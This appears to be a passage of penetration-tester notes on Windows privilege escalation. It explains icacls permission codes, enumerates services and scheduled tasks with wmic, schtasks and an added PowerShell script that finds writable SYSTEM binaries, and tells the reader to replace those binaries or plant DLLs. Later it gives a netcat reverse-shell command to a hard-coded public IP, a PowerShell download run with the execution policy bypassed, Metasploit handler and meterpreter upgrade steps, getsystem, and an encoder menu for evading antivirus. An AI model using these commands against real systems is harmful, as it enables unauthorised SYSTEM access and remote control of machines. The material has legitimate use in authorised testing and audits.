The following image highlights the Java JDK's bin directory, which is contained in the system
PATH variable. A PATH directory that low-privileged users can write to lets them plant binaries
or DLLs that privileged processes will pick up:
If a service binary is located in such a directory, any authenticated user can overwrite the binary
or the service's DLLs and, when the service next starts, run code as the service account (often
LocalSystem). The following output shows the default permissions Windows assigns to a newly
created directory called DangerousService under the C:\ drive on a Windows Server 2008 R2 system.
The rights abbreviations in icacls output are (this is the second half of the icacls legend; the
simple rights and the first specific rights are listed under Cacls or Icacls below):
    S - synchronize
    AS - access system security
    MA - maximum allowed
    GR - generic read
    GW - generic write
    GE - generic execute
    GA - generic all
    RD - read data/list directory
    WD - write data/add file
    AD - append data/add subdirectory
    REA - read extended attributes
    WEA - write extended attributes
    X - execute/traverse
    DC - delete child
    RA - read attributes
    WA - write attributes
Inheritance rights can precede either form and are applied only to directories:
    (OI) - object inherit
    (CI) - container inherit
    (IO) - inherit only
    (NP) - don't propagate inherit
    (I) - permission inherited from parent container
Tools
Accesschk (Sysinternals) - check effective permissions on services, files, directories and registry keys
PsInfo.exe
PsExec - execute as a different user (-s runs the command as SYSTEM)
WindowsPrivEsc.ppt
Weak Service Exploitation
#list all services
wmic service list brief
#list all services with binary path, start mode and start account
wmic service list config
#compile a list of service binaries outside system32 and dump their ACLs; look for F, M, W, WD, AD, WDAC or WO granted to Everyone, Users, Authenticated Users or your own account
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> permissions.txt
for /f eol^=^"^ delims^=^" %a in (permissions.txt) do cmd.exe /c icacls "%a"
#start a service with wmic (here the ose service, the Office Source Engine)
wmic service where name="ose" call startservice
Windows_Services_-_All_roads_lead_to_SYSTEM.pdf
Windows Privilege Escalation Checker (windows-privesc-check)
windows-privesc-check2.exe --audit -a -o result
Check Schtasks
schtasks /query /fo LIST /v
Look at the "Run As User" and "Task To Run" fields: a task that runs as SYSTEM and whose binary or
script you can write to gives you SYSTEM the next time it fires.
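The service and scheduled-task checks above done in one script, as an added example (this is not code from the original notes or from any of the referenced tools): it pulls every service image path and every privileged task action, resolves the executable from quoted or unquoted command lines, and evaluates the file and directory ACLs against the current token's SIDs, so the icacls output does not have to be read by eye. It assumes Windows PowerShell 3 or later for Get-CimInstance, and Windows 8 / Server 2012 or later for Get-ScheduledTask (on Server 2008 R2 parse `schtasks /query /fo CSV /v` instead). The function names are the example's own.

```powershell
# Added example, not part of the original notes: find services and scheduled
# tasks whose executable, or the directory holding it, the current user can
# write to. Assumes PowerShell 3+ (Get-CimInstance) and Windows 8 / 2012+
# for Get-ScheduledTask.

# Rights that let the caller replace or alter the file (or drop a file into a
# directory): WD, AD, DE, plus WDAC and WO, which can be used to grant the rest.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights](
    'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership')

function Get-ExecutableFromCommandLine {
    param([string]$CommandLine)
    # "C:\Program Files\Foo\svc.exe" -k arg   -> quoted image path
    if ($CommandLine -match '^\s*"([^"]+)"') { return $Matches[1] }
    # C:\Program Files\Foo\svc.exe -k arg     -> unquoted: take up to .exe
    if ($CommandLine -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return ($CommandLine.Trim() -split '\s+')[0]
}

function Test-WritableByCurrentUser {
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $allow = $false; $deny = $false
    $inheritOnly = [int][System.Security.AccessControl.PropagationFlags]::InheritOnly
    foreach ($ace in $acl.Access) {
        # (IO) entries apply to children only, not to this object itself
        if (([int]$ace.PropagationFlags -band $inheritOnly) -ne 0) { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($sids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { $deny = $true } else { $allow = $true }
    }
    # A matching Deny wins over Allow, as in the kernel's access check
    return ($allow -and -not $deny)
}

function Get-ParentDirectory {
    param([string]$Path)
    if ($Path) { return Split-Path -Path $Path -Parent } else { return $null }
}

function Get-WritableServiceBinaries {
    Get-CimInstance Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
        $exe = [Environment]::ExpandEnvironmentVariables((Get-ExecutableFromCommandLine $_.PathName))
        $dir = Get-ParentDirectory $exe
        # An unquoted path with spaces is a separate hijack (C:\Program.exe etc.)
        $unquoted = ($_.PathName -notmatch '^\s*"') -and ($exe -match ' ')
        $exeW = Test-WritableByCurrentUser $exe
        $dirW = Test-WritableByCurrentUser $dir
        if ($exeW -or $dirW -or $unquoted) {
            [pscustomobject]@{
                Kind = 'Service'; Name = $_.Name; RunsAs = $_.StartName; StartMode = $_.StartMode
                Executable = $exe; ExeWritable = $exeW; DirWritable = $dirW; UnquotedSpacePath = $unquoted
            }
        }
    }
}

function Get-WritableScheduledTaskBinaries {
    # Only tasks running as SYSTEM or elevated are worth hijacking; Principal.UserId
    # is the "Run As User" column of schtasks /query /v.
    Get-ScheduledTask |
      Where-Object { $_.Principal.UserId -match 'SYSTEM|S-1-5-18' -or $_.Principal.RunLevel -eq 'Highest' } |
      ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            $exe = [Environment]::ExpandEnvironmentVariables((Get-ExecutableFromCommandLine $action.Execute))
            $dir = Get-ParentDirectory $exe
            $exeW = Test-WritableByCurrentUser $exe
            $dirW = Test-WritableByCurrentUser $dir
            if ($exeW -or $dirW) {
                [pscustomobject]@{
                    Kind = 'Task'; Name = "$($task.TaskPath)$($task.TaskName)"; RunsAs = $task.Principal.UserId
                    StartMode = $task.State; Executable = $exe; ExeWritable = $exeW; DirWritable = $dirW
                    UnquotedSpacePath = $false
                }
            }
        }
    }
}

@(Get-WritableServiceBinaries) + @(Get-WritableScheduledTaskBinaries) | Format-Table -AutoSize
```

Anything reported with ExeWritable or DirWritable set to True, and RunsAs LocalSystem or SYSTEM, is the case the notes describe: replace the binary (or drop a DLL beside it), then start the service with wmic or sc, or wait for the task to fire. UnquotedSpacePath flags image paths such as C:\Program Files\Foo Bar\svc.exe that were registered without quotes, where a writable C:\ or C:\Program Files\ would let you plant C:\Program.exe or Foo.exe.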
Cacls or Icacls
Perm is a permission mask that can be specified in one of the following forms:
A sequence of simple rights:
    N (no access)
    F (full access)
    M (modify access)
    RX (read and execute access)
    R (read-only access)
    W (write-only access)
    D (delete access)
A comma-separated list in parentheses of specific rights:
    DE (delete)
    RC (read control)
    WDAC (write DAC)
    WO (write owner)
    S (synchronize)
    AS (access system security)
    MA (maximum allowed)
    GR (generic read)
    GW (generic write)
    GE (generic execute)
    GA (generic all)
    RD (read data/list directory)
    WD (write data/add file)
    AD (append data/add subdirectory, i.e. FILE_APPEND_DATA)
    (REA, WEA, X, DC, RA, WA and the inheritance flags are listed with the icacls output above)
For privilege escalation the interesting entries are F, M, W, WD, AD, WDAC or WO granted to
BUILTIN\Users, Everyone, Authenticated Users or the current account.
Getsystem
getsystem
If it fails, run post/windows/manage/migrate to move into a more suitable process and try again.
Download file using powershell
#write the download command to a script file, then run it with the execution policy bypassed
echo (New-Object System.Net.WebClient).DownloadFile("https://i.ytimg.com/vi/ndsaoMFz9J4/maxresdefault.jpg", ".\cat.jpg") >> meow.ps1
powershell -ExecutionPolicy ByPass -File meow.ps1
netcat nc remote shell (on the target)
nc64.exe -nv 54.169.207.161 13337 -e cmd.exe
netcat nc host remote shell (listener on the attacking host)
nc -lv -p 13337
VirtualBox to public IP
Set the VM network adapter to bridged and forward the listener port on the modem/router.
Upgrading a netcat shell to a meterpreter shell
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
(set LHOST/LPORT to match the listener, then run; on the target connect back with nc64.exe -nv 54.169.207.161 13337 -e cmd.exe)
sessions -u [id]
Upgrading a 32-bit shell to a 64-bit meterpreter shell
use exploit/windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp
nmap examples
nmap -sT -A -Pn [IP addr]
(-Pn skips host discovery; the older spelling is -P0, a zero, not the letter O)
Encoder selection menu (Metasploit x86 encoders offered for AV bypass)
What encoder would you like to try and bypass AV with?
    1. avoid_utf8_tolower   Avoid UTF8/tolower
    2. shikata_ga_nai       Polymorphic XOR Additive Feedback Encoder
    3. alpha_mixed          Alpha2 Alphanumeric Mixedcase Encoder
    4. alpha_upper          Alpha2 Alphanumeric Uppercase Encoder
    5. call4_dword_xor      Call+4 Dword XOR Encoder
    6. countdown            Single-byte XOR Countdown Encoder
    7. fnstenv_mov          Variable-length Fnstenv/mov Dword XOR Encoder
    8. jmp_call_additive    Jump/Call XOR Additive Feedback Encoder
    9. nonalpha             Non-Alpha Encoder
    10. nonupper            Non-Upper Encoder
    11. unicode_mixed       Alpha2 Alphanumeric Unicode Mixedcase Encoder
    12. unicode_upper       Alpha2 Alphanumeric Unicode Uppercase Encoder
Enter number: 2
171.248.151.85:13337
These encoders exist to avoid bad characters in the payload, not to defeat AV; the decoder stubs
(shikata_ga_nai in particular) are well known to AV engines, so do not rely on them for evasion.
Reference
1. http://www.fuzzysecurity.com/tutorials/16.html
2. http://infosecluke.blogspot.com/2013/05/from-netcat-nc-to-meterpreter-shell.html
3. https://www.youtube.com/watch?v=j0L91QmAvVE
4. https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
5. https://sathisharthars.wordpress.com/2014/06/19/bypass-uac-and-get-admin-privilege-in-windows-7-using-metasploit/
6. https://laharisi.wordpress.com/2011/04/07/privilege-escalation-windows-uac-bypass/
7. https://packetstormsecurity.com/files/125544/Windows-Escalate-UAC-Protection-Bypass-In-Memory-Injection.html
8. http://netsec.ws/?p=331
9. http://hatriot.github.io/blog/2014/03/10/meterpreter-shell-upgrades-using-powershell/
10. http://toshellandback.com/2015/11/24/ms-priv-esc/